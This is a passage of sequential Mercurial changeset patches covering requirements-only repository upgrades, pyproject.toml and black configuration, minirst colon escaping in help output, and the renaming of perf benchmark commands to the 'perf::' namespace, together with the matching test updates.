a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -449,7 +449,7 @@ ) ) - if True: + if not upgrade_op.requirements_only: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( ui, @@ -533,6 +533,7 @@ # location. This is simpler. backupvfs.unlink(b'store/lock') else: - pass + ui.status(_(b'upgrading repository requirements\n')) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) return backuppath diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -371,26 +371,8 @@ repository locked and read-only creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) (it is safe to interrupt this process any time before data migration completes) - migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) - migrating 626 bytes in store; 271 bytes tracked data - migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) - finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes - migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) - finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes - migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) - finished migrating 2 changelog revisions; change in size: 0 bytes - finished migrating 6 total revisions; total change in store size: 0 bytes - copying phaseroots - data fully upgraded in a temporary repository - marking source repository as being upgraded; clients will be unable to read from repository - starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - replacing store... - store replacement complete; repository was inconsistent for *s (glob) - finalizing requirements file and making repository readable again + upgrading repository requirements removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) - copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode. $ hg debugrequirements @@ -475,27 +457,8 @@ repository locked and read-only creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) (it is safe to interrupt this process any time before data migration completes) - migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) - migrating 626 bytes in store; 271 bytes tracked data - migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) - finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes - migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) - finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes - migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) - finished migrating 2 changelog revisions; change in size: 0 bytes - finished migrating 6 total revisions; total change in store size: 0 bytes - copying phaseroots - copying requires - data fully upgraded in a temporary repository - marking source repository as being upgraded; clients will be unable to read from repository - starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - replacing store... - store replacement complete; repository was inconsistent for *s (glob) - finalizing requirements file and making repository readable again + upgrading repository requirements removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) - copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared. $ hg debugrequirements # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845124 18000 # Tue Dec 01 12:52:04 2020 -0500 # Node ID 45afff0f530a48b232a655ecd1af3978cef25b11 # Parent f2c4224e66483512d48997485114bf5c8a7e1080 pyproject: add config file This will tell pip et al to call our setup.py for the majority of packaging concerns, but also gives us a place to put standard config stuff like black. Differential Revision: https://phab.mercurial-scm.org/D9833 diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,3 @@ +[build-system] +requires = ["setuptools", "wheel"] +build-backend = "setuptools.build_meta" diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -70,6 +70,7 @@ hg hgeditor hgweb.cgi + pyproject.toml rustfmt.toml setup.py # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845573 18000 # Tue Dec 01 12:59:33 2020 -0500 # Node ID d4c8b4b90ecb9df37b64569f89a8921c1083ac54 # Parent 45afff0f530a48b232a655ecd1af3978cef25b11 black: merge config into main pyproject.toml now that we have it This means that naive contributors who just run `black` on a source file will get reasonable behavior as long as they have a recent black. Yay! Differential Revision: https://phab.mercurial-scm.org/D9834 diff --git a/black.toml b/black.toml deleted file mode 100644 --- a/black.toml +++ /dev/null @@ -1,14 +0,0 @@ -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black --config=black.toml - +black:command = black black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/pyproject.toml b/pyproject.toml --- a/pyproject.toml +++ b/pyproject.toml @@ -1,3 +1,18 @@ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" + +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -66,7 +66,6 @@ COPYING Makefile README.rst - black.toml hg hgeditor hgweb.cgi diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,5 @@ #require black test-repo $ cd $RUNTESTDIR/.. - $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611588883 -3600 # Mon Jan 25 16:34:43 2021 +0100 # Node ID 374d7fff7cb5dc0e291e59d469aeb1c5f24a7639 # Parent d4c8b4b90ecb9df37b64569f89a8921c1083ac54 store: use `endswith` to detect revlog extension Suggested by Gregory Szorc. Differential Revision: https://phab.mercurial-scm.org/D9865 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -387,13 +387,13 @@ b'requires', ] +REVLOG_FILES_EXT = (b'.i', b'.d', b'.n', b'.nd') + def isrevlog(f, kind, st): if kind != stat.S_IFREG: return False - if f[-2:] in (b'.i', b'.d', b'.n'): - return True - return f[-3:] == b'.nd' + return f.endswith(REVLOG_FILES_EXT) class basicstore(object): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611618340 -3600 # Tue Jan 26 00:45:40 2021 +0100 # Node ID 7bb31c367847f1f1e1331b91633cee4a31025c1a # Parent 374d7fff7cb5dc0e291e59d469aeb1c5f24a7639 run-test: avoid byte issue when replacing output file of python test Otherwise we get error like:: FileNotFoundError: [Errno 2] No such file or directory: "b'…/tests/test-minirst.py'.out" Differential Revision: https://phab.mercurial-scm.org/D9868 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -2278,7 +2278,7 @@ if test.path.endswith(b'.t'): rename(test.errpath, test.path) else: - rename(test.errpath, '%s.out' % test.path) + rename(test.errpath, b'%s.out' % test.path) accepted = True if not accepted: self.faildata[test.name] = b''.join(lines) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611612476 -3600 # Mon Jan 25 23:07:56 2021 +0100 # Node ID aaff3bc753064c9cddf9037406d9b835d0d633c5 # Parent 7bb31c367847f1f1e1331b91633cee4a31025c1a minirst: respect escaping in definition list key If we start adding `:` in command names… we need minirst to not choke on them. Differential Revision: https://phab.mercurial-scm.org/D9869 diff --git a/mercurial/minirst.py b/mercurial/minirst.py --- a/mercurial/minirst.py +++ b/mercurial/minirst.py @@ -158,7 +158,7 @@ _optionre = re.compile( br'^(-([a-zA-Z0-9]), )?(--[a-z0-9-]+)' br'((.*) +)(.*)$' ) -_fieldre = re.compile(br':(?![: ])([^:]*)(?<! ):[ ]+(.*)') +_fieldre = re.compile(br':(?![: ])((?:\:|[^:])*)(?<! ):[ ]+(.*)') _definitionre = re.compile(br'[^ ]') _tablere = re.compile(br'(=+\s+)*=+') @@ -229,7 +229,7 @@ m = _fieldre.match(blocks[j][b'lines'][0]) key, rest = m.groups() blocks[j][b'lines'][0] = rest - blocks[j][b'key'] = key + blocks[j][b'key'] = key.replace(br'\:', b':') j += 1 i = j + 1 diff --git a/tests/test-minirst.py b/tests/test-minirst.py --- a/tests/test-minirst.py +++ b/tests/test-minirst.py @@ -159,6 +159,8 @@ :a: First item. :ab: Second item. Indentation and wrapping is handled automatically. +:c\:d: a key with colon +:efg\:\:hh: a key with many colon Next list: diff --git a/tests/test-minirst.py.out b/tests/test-minirst.py.out --- a/tests/test-minirst.py.out +++ b/tests/test-minirst.py.out @@ -439,6 +439,8 @@ a First item. ab Second item. Indentation and wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many colon Next list: @@ -456,6 +458,9 @@ wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many + colon Next list: @@ -476,6 +481,10 @@ <dd>First item. <dt>ab <dd>Second item. Indentation and wrapping is handled automatically. + <dt>c:d + <dd>a key with colon + <dt>efg::hh + <dd>a key with many colon </dl> <p> Next list: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611612513 -3600 # Mon Jan 25 23:08:33 2021 +0100 # Node ID d481f30ea8e392b1d4db7d00ef023815335db132 # Parent aaff3bc753064c9cddf9037406d9b835d0d633c5 help: escape ':' (as '\:') when generating command names We need this before we can use ":" in command names. Differential Revision: https://phab.mercurial-scm.org/D9870 diff --git a/mercurial/help.py b/mercurial/help.py --- a/mercurial/help.py +++ b/mercurial/help.py @@ -829,10 +829,11 @@ def appendcmds(cmds): cmds = sorted(cmds) for c in cmds: + display_cmd = c if ui.verbose: - rst.append(b" :%s: %s\n" % (b', '.join(syns[c]), h[c])) - else: - rst.append(b' :%s: %s\n' % (c, h[c])) + display_cmd = b', '.join(syns[c]) + display_cmd = display_cmd.replace(b':', br'\:') + rst.append(b' :%s: %s\n' % (display_cmd, h[c])) if name in (b'shortlist', b'debug'): # List without categories. # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611612781 -3600 # Mon Jan 25 23:13:01 2021 +0100 # Node ID c41ac8985fe47c79604243eeff4a673671112109 # Parent d481f30ea8e392b1d4db7d00ef023815335db132 perf: test the formatting of a command help Since we are about to addd ':' in command name I want this covered. Differential Revision: https://phab.mercurial-scm.org/D9871 diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -195,6 +195,20 @@ perf--write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) + + $ hg help perfaddremove + hg perf--addremove + + aliases: perfaddremove + + (no help text available) + + options: + + -T --template TEMPLATE display with template + + (some details hidden, use --verbose to show complete help) + $ hg perfaddremove $ hg perfancestors $ hg perfancestorset 2 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611589611 -3600 # Mon Jan 25 16:46:51 2021 +0100 # Node ID d8ad391e10f501c817ae80a88050a7cb78a1e782 # Parent c41ac8985fe47c79604243eeff4a673671112109 command-namespace: use `::` are the command separator This was discussed on the mailing list / phab and `::` got a couple of positive feedback. I dediced to not introduce automatic folding of `::`, I feel like it make sense for `-`, but I like the expliciteness of `::`. So I am adding alias for backward compatibility. Differential Revision: https://phab.mercurial-scm.org/D9872 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -744,7 +744,7 @@ # perf commands -@command(b'perf--walk', formatteropts) +@command(b'perf::walk|perfwalk', formatteropts) def perfwalk(ui, repo, *pats, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -759,7 +759,7 @@ fm.end() -@command(b'perf--annotate', formatteropts) +@command(b'perf::annotate|perfannotate', formatteropts) def perfannotate(ui, repo, f, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -769,7 +769,7 @@ @command( - b'perf--status', + b'perf::status|perfstatus', [ (b'u', b'unknown', False, b'ask status to look for unknown files'), (b'', b'dirstate', False, b'benchmark the internal dirstate call'), @@ -806,7 +806,7 @@ fm.end() -@command(b'perf--addremove', formatteropts) +@command(b'perf::addremove|perfaddremove', formatteropts) def perfaddremove(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -837,7 +837,7 @@ cl._nodepos = None -@command(b'perf--heads', formatteropts) +@command(b'perf::heads|perfheads', formatteropts) def perfheads(ui, repo, **opts): """benchmark the computation of a changelog heads""" opts = _byteskwargs(opts) @@ -855,7 +855,7 @@ @command( - b'perf--tags', + b'perf::tags|perftags', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -880,7 +880,7 @@ fm.end() -@command(b'perf--ancestors', formatteropts) +@command(b'perf::ancestors|perfancestors', formatteropts) def perfancestors(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -894,7 +894,7 @@ fm.end() -@command(b'perf--ancestorset', formatteropts) +@command(b'perf::ancestorset|perfancestorset', formatteropts) def perfancestorset(ui, repo, revset, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -910,7 +910,7 @@ fm.end() -@command(b'perf--discovery', formatteropts, b'PATH') +@command(b'perf::discovery|perfdiscovery', formatteropts, b'PATH') def perfdiscovery(ui, repo, path, **opts): """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] @@ -928,7 +928,7 @@ @command( - b'perf--bookmarks', + b'perf::bookmarks|perfbookmarks', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -953,7 +953,7 @@ fm.end() -@command(b'perf--bundleread', formatteropts, b'BUNDLE') +@command(b'perf::bundleread|perfbundleread', formatteropts, b'BUNDLE') def perfbundleread(ui, repo, bundlepath, **opts): """Benchmark reading of bundle files. @@ -1080,7 +1080,7 @@ @command( - b'perf--changegroupchangelog', + b'perf::changegroupchangelog|perfchangegroupchangelog', formatteropts + [ (b'', b'cgversion', b'02', b'changegroup version'), @@ -1116,7 +1116,7 @@ fm.end() -@command(b'perf--dirs', formatteropts) +@command(b'perf::dirs|perfdirs', formatteropts) def perfdirs(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1132,7 +1132,7 @@ @command( - b'perf--dirstate', + b'perf::dirstate|perfdirstate', [ ( b'', @@ -1195,7 +1195,7 @@ fm.end() -@command(b'perf--dirstatedirs', formatteropts) +@command(b'perf::dirstatedirs|perfdirstatedirs', formatteropts) def perfdirstatedirs(ui, repo, **opts): """benchmap a 'dirstate.hasdir' call from an empty `dirs` cache""" opts = _byteskwargs(opts) @@ -1212,7 +1212,7 @@ fm.end() -@command(b'perf--dirstatefoldmap', formatteropts) +@command(b'perf::dirstatefoldmap|perfdirstatefoldmap', formatteropts) def perfdirstatefoldmap(ui, repo, **opts): """benchmap a `dirstate._map.filefoldmap.get()` request @@ -1233,7 +1233,7 @@ fm.end() -@command(b'perf--dirfoldmap', formatteropts) +@command(b'perf::dirfoldmap|perfdirfoldmap', formatteropts) def perfdirfoldmap(ui, repo, **opts): """benchmap a `dirstate._map.dirfoldmap.get()` request @@ -1255,7 +1255,7 @@ fm.end() -@command(b'perf--dirstatewrite', formatteropts) +@command(b'perf::dirstatewrite|perfdirstatewrite', formatteropts) def perfdirstatewrite(ui, repo, **opts): """benchmap the time it take to write a dirstate on disk""" opts = _byteskwargs(opts) @@ -1297,7 +1297,7 @@ @command( - b'perf--mergecalculate', + b'perf::mergecalculate|perfmergecalculate', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1330,7 +1330,7 @@ @command( - b'perf--mergecopies', + b'perf::mergecopies|perfmergecopies', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1353,7 +1353,7 @@ fm.end() -@command(b'perf--pathcopies', [], b"REV REV") +@command(b'perf::pathcopies|perfpathcopies', [], b"REV REV") def perfpathcopies(ui, repo, rev1, rev2, **opts): """benchmark the copy tracing logic""" opts = _byteskwargs(opts) @@ -1369,7 +1369,7 @@ @command( - b'perf--phases', + b'perf::phases|perfphases', [ (b'', b'full', False, b'include file reading time too'), ], @@ -1394,7 +1394,7 @@ fm.end() -@command(b'perf--phasesremote', [], b"[DEST]") +@command(b'perf::phasesremote|perfphasesremote', [], b"[DEST]") def perfphasesremote(ui, repo, dest=None, **opts): """benchmark time needed to analyse phases of the remote server""" from mercurial.node import bin @@ -1455,7 +1455,7 @@ @command( - b'perf--manifest', + b'perf::manifest|perfmanifest', [ (b'm', b'manifest-rev', False, b'Look up a manifest node revision'), (b'', b'clear-disk', False, b'clear on-disk caches too'), @@ -1499,7 +1499,7 @@ fm.end() -@command(b'perf--changeset', formatteropts) +@command(b'perf::changeset|perfchangeset', formatteropts) def perfchangeset(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1513,7 +1513,7 @@ fm.end() -@command(b'perf--ignore', formatteropts) +@command(b'perf::ignore|perfignore', formatteropts) def perfignore(ui, repo, **opts): """benchmark operation related to computing ignore""" opts = _byteskwargs(opts) @@ -1532,7 +1532,7 @@ @command( - b'perf--index', + b'perf::index|perfindex', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'no-lookup', None, b'do not revision lookup post creation'), @@ -1596,7 +1596,7 @@ @command( - b'perf--nodemap', + b'perf::nodemap|perfnodemap', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'clear-caches', True, b'clear revlog cache between calls'), @@ -1667,7 +1667,7 @@ fm.end() -@command(b'perf--startup', formatteropts) +@command(b'perf::startup|perfstartup', formatteropts) def perfstartup(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1685,7 +1685,7 @@ fm.end() -@command(b'perf--parents', formatteropts) +@command(b'perf::parents|perfparents', formatteropts) def perfparents(ui, repo, **opts): """benchmark the time necessary to fetch one changeset's parents. @@ -1712,7 +1712,7 @@ fm.end() -@command(b'perf--ctxfiles', formatteropts) +@command(b'perf::ctxfiles|perfctxfiles', formatteropts) def perfctxfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1725,7 +1725,7 @@ fm.end() -@command(b'perf--rawfiles', formatteropts) +@command(b'perf::rawfiles|perfrawfiles', formatteropts) def perfrawfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1739,7 +1739,7 @@ fm.end() -@command(b'perf--lookup', formatteropts) +@command(b'perf::lookup|perflookup', formatteropts) def perflookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1748,7 +1748,7 @@ @command( - b'perf--linelogedits', + b'perf::linelogedits|perflinelogedits', [ (b'n', b'edits', 10000, b'number of edits'), (b'', b'max-hunk-lines', 10, b'max lines in a hunk'), @@ -1786,7 +1786,7 @@ fm.end() -@command(b'perf--revrange', formatteropts) +@command(b'perf::revrange|perfrevrange', formatteropts) def perfrevrange(ui, repo, *specs, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1795,7 +1795,7 @@ fm.end() -@command(b'perf--nodelookup', formatteropts) +@command(b'perf::nodelookup|perfnodelookup', formatteropts) def perfnodelookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1814,7 +1814,7 @@ @command( - b'perf--log', + b'perf::log|perflog', [(b'', b'rename', False, b'ask log to follow renames')] + formatteropts, ) def perflog(ui, repo, rev=None, **opts): @@ -1832,7 +1832,7 @@ fm.end() -@command(b'perf--moonwalk', formatteropts) +@command(b'perf::moonwalk|perfmoonwalk', formatteropts) def perfmoonwalk(ui, repo, **opts): """benchmark walking the changelog backwards @@ -1851,7 +1851,7 @@ @command( - b'perf--templating', + b'perf::templating|perftemplating', [ (b'r', b'rev', [], b'revisions to run the template on'), ] @@ -1941,7 +1941,7 @@ @command( - b'perf--helper-mergecopies', + b'perf::helper-mergecopies|perfhelper-mergecopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2124,7 +2124,7 @@ @command( - b'perf--helper-pathcopies', + b'perf::helper-pathcopies|perfhelper-pathcopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2263,7 +2263,7 @@ _displaystats(ui, opts, entries, alldata) -@command(b'perf--cca', formatteropts) +@command(b'perf::cca|perfcca', formatteropts) def perfcca(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2271,7 +2271,7 @@ fm.end() -@command(b'perf--fncacheload', formatteropts) +@command(b'perf::fncacheload|perffncacheload', formatteropts) def perffncacheload(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2284,7 +2284,7 @@ fm.end() -@command(b'perf--fncachewrite', formatteropts) +@command(b'perf::fncachewrite|perffncachewrite', formatteropts) def perffncachewrite(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2304,7 +2304,7 @@ fm.end() -@command(b'perf--fncacheencode', formatteropts) +@command(b'perf::fncacheencode|perffncacheencode', formatteropts) def perffncacheencode(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2348,7 +2348,7 @@ @command( - b'perf--bdiff', + b'perf::bdiff|perfbdiff', revlogopts + formatteropts + [ @@ -2464,7 +2464,7 @@ @command( - b'perf--unidiff', + b'perf::unidiff|perfunidiff', revlogopts + formatteropts + [ @@ -2543,7 +2543,7 @@ fm.end() -@command(b'perf--diffwd', formatteropts) +@command(b'perf::diffwd|perfdiffwd', formatteropts) def perfdiffwd(ui, repo, **opts): """Profile diff of working directory changes""" opts = _byteskwargs(opts) @@ -2568,7 +2568,11 @@ fm.end() -@command(b'perf--revlogindex', revlogopts + formatteropts, b'-c|-m|FILE') +@command( + b'perf::revlogindex|perfrevlogindex', + revlogopts + formatteropts, + b'-c|-m|FILE', +) def perfrevlogindex(ui, repo, file_=None, **opts): """Benchmark operations against a revlog index. @@ -2704,7 +2708,7 @@ @command( - b'perf--revlogrevisions', + b'perf::revlogrevisions|perfrevlogrevisions', revlogopts + formatteropts + [ @@ -2754,7 +2758,7 @@ @command( - b'perf--revlogwrite', + b'perf::revlogwrite|perfrevlogwrite', revlogopts + formatteropts + [ @@ -3047,7 +3051,7 @@ @command( - b'perf--revlogchunks', + b'perf::revlogchunks|perfrevlogchunks', revlogopts + formatteropts + [ @@ -3176,7 +3180,7 @@ @command( - b'perf--revlogrevision', + b'perf::revlogrevision|perfrevlogrevision', revlogopts + formatteropts + [(b'', b'cache', False, b'use caches instead of clearing')], @@ -3319,7 +3323,7 @@ @command( - b'perf--revset', + b'perf::revset|perfrevset', [ (b'C', b'clear', False, b'clear volatile cache between each call.'), (b'', b'contexts', False, b'obtain changectx for each revision'), @@ -3352,7 +3356,7 @@ @command( - b'perf--volatilesets', + b'perf::volatilesets|perfvolatilesets', [ (b'', b'clear-obsstore', False, b'drop obsstore between each call.'), ] @@ -3401,7 +3405,7 @@ @command( - b'perf--branchmap', + b'perf::branchmap|perfbranchmap', [ (b'f', b'full', False, b'Includes build time of subset'), ( @@ -3492,7 +3496,7 @@ @command( - b'perf--branchmapupdate', + b'perf::branchmapupdate|perfbranchmapupdate', [ (b'', b'base', [], b'subset of revision to start from'), (b'', b'target', [], b'subset of revision to end with'), @@ -3602,7 +3606,7 @@ @command( - b'perf--branchmapload', + b'perf::branchmapload|perfbranchmapload', [ (b'f', b'filter', b'', b'Specify repoview filter'), (b'', b'list', False, b'List brachmap filter caches'), @@ -3661,7 +3665,7 @@ fm.end() -@command(b'perf--loadmarkers') +@command(b'perf::loadmarkers|perfloadmarkers') def perfloadmarkers(ui, repo): """benchmark the time to parse the on-disk markers for a repo @@ -3673,7 +3677,7 @@ @command( - b'perf--lrucachedict', + b'perf::lrucachedict|perflrucachedict', formatteropts + [ (b'', b'costlimit', 0, b'maximum total cost of items in cache'), @@ -3829,7 +3833,7 @@ @command( - b'perf--write', + b'perf::write|perfwrite', formatteropts + [ (b'', b'write-method', b'write', b'ui write method'), @@ -3892,7 +3896,7 @@ @command( - b'perf--progress', + b'perf::progress|perfprogress', formatteropts + [ (b'', b'topic', b'topic', b'topic for progress messages'), diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -78,126 +78,126 @@ list of commands: - perf--addremove + perf::addremove (no help text available) - perf--ancestors + perf::ancestors (no help text available) - perf--ancestorset + perf::ancestorset (no help text available) - perf--annotate + perf::annotate (no help text available) - perf--bdiff benchmark a bdiff between revisions - perf--bookmarks + perf::bdiff benchmark a bdiff between revisions + perf::bookmarks benchmark parsing bookmarks from disk to memory - perf--branchmap + perf::branchmap benchmark the update of a branchmap - perf--branchmapload + perf::branchmapload benchmark reading the branchmap - perf--branchmapupdate + perf::branchmapupdate benchmark branchmap update from for <base> revs to <target> revs - perf--bundleread + perf::bundleread Benchmark reading of bundle files. - perf--cca (no help text available) - perf--changegroupchangelog + perf::cca (no help text available) + perf::changegroupchangelog Benchmark producing a changelog group for a changegroup. - perf--changeset + perf::changeset (no help text available) - perf--ctxfiles + perf::ctxfiles (no help text available) - perf--diffwd Profile diff of working directory changes - perf--dirfoldmap + perf::diffwd Profile diff of working directory changes + perf::dirfoldmap benchmap a 'dirstate._map.dirfoldmap.get()' request - perf--dirs (no help text available) - perf--dirstate + perf::dirs (no help text available) + perf::dirstate benchmap the time of various distate operations - perf--dirstatedirs + perf::dirstatedirs benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache - perf--dirstatefoldmap + perf::dirstatefoldmap benchmap a 'dirstate._map.filefoldmap.get()' request - perf--dirstatewrite + perf::dirstatewrite benchmap the time it take to write a dirstate on disk - perf--discovery + perf::discovery benchmark discovery between local repo and the peer at given path - perf--fncacheencode + perf::fncacheencode (no help text available) - perf--fncacheload + perf::fncacheload (no help text available) - perf--fncachewrite + perf::fncachewrite (no help text available) - perf--heads benchmark the computation of a changelog heads - perf--helper-mergecopies + perf::heads benchmark the computation of a changelog heads + perf::helper-mergecopies find statistics about potential parameters for 'perfmergecopies' - perf--helper-pathcopies + perf::helper-pathcopies find statistic about potential parameters for the 'perftracecopies' - perf--ignore benchmark operation related to computing ignore - perf--index benchmark index creation time followed by a lookup - perf--linelogedits + perf::ignore benchmark operation related to computing ignore + perf::index benchmark index creation time followed by a lookup + perf::linelogedits (no help text available) - perf--loadmarkers + perf::loadmarkers benchmark the time to parse the on-disk markers for a repo - perf--log (no help text available) - perf--lookup (no help text available) - perf--lrucachedict + perf::log (no help text available) + perf::lookup (no help text available) + perf::lrucachedict (no help text available) - perf--manifest + perf::manifest benchmark the time to read a manifest from disk and return a usable - perf--mergecalculate + perf::mergecalculate (no help text available) - perf--mergecopies + perf::mergecopies measure runtime of 'copies.mergecopies' - perf--moonwalk + perf::moonwalk benchmark walking the changelog backwards - perf--nodelookup + perf::nodelookup (no help text available) - perf--nodemap + perf::nodemap benchmark the time necessary to look up revision from a cold nodemap - perf--parents + perf::parents benchmark the time necessary to fetch one changeset's parents. - perf--pathcopies + perf::pathcopies benchmark the copy tracing logic - perf--phases benchmark phasesets computation - perf--phasesremote + perf::phases benchmark phasesets computation + perf::phasesremote benchmark time needed to analyse phases of the remote server - perf--progress + perf::progress printing of progress bars - perf--rawfiles + perf::rawfiles (no help text available) - perf--revlogchunks + perf::revlogchunks Benchmark operations on revlog chunks. - perf--revlogindex + perf::revlogindex Benchmark operations against a revlog index. - perf--revlogrevision + perf::revlogrevision Benchmark obtaining a revlog revision. - perf--revlogrevisions + perf::revlogrevisions Benchmark reading a series of revisions from a revlog. - perf--revlogwrite + perf::revlogwrite Benchmark writing a series of revisions to a revlog. - perf--revrange + perf::revrange (no help text available) - perf--revset benchmark the execution time of a revset - perf--startup + perf::revset benchmark the execution time of a revset + perf::startup (no help text available) - perf--status benchmark the performance of a single status call - perf--tags (no help text available) - perf--templating + perf::status benchmark the performance of a single status call + perf::tags (no help text available) + perf::templating test the rendering time of a given template - perf--unidiff + perf::unidiff benchmark a unified diff between revisions - perf--volatilesets + perf::volatilesets benchmark the computation of various volatile set - perf--walk (no help text available) - perf--write microbenchmark ui.write (and others) + perf::walk (no help text available) + perf::write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) $ hg help perfaddremove - hg perf--addremove + hg perf::addremove aliases: perfaddremove # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1611619407 18000 # Mon Jan 25 19:03:27 2021 -0500 # Node ID 38b9a63d3a13176a2d83a13898d51fe617e5ecda # Parent d8ad391e10f501c817ae80a88050a7cb78a1e782 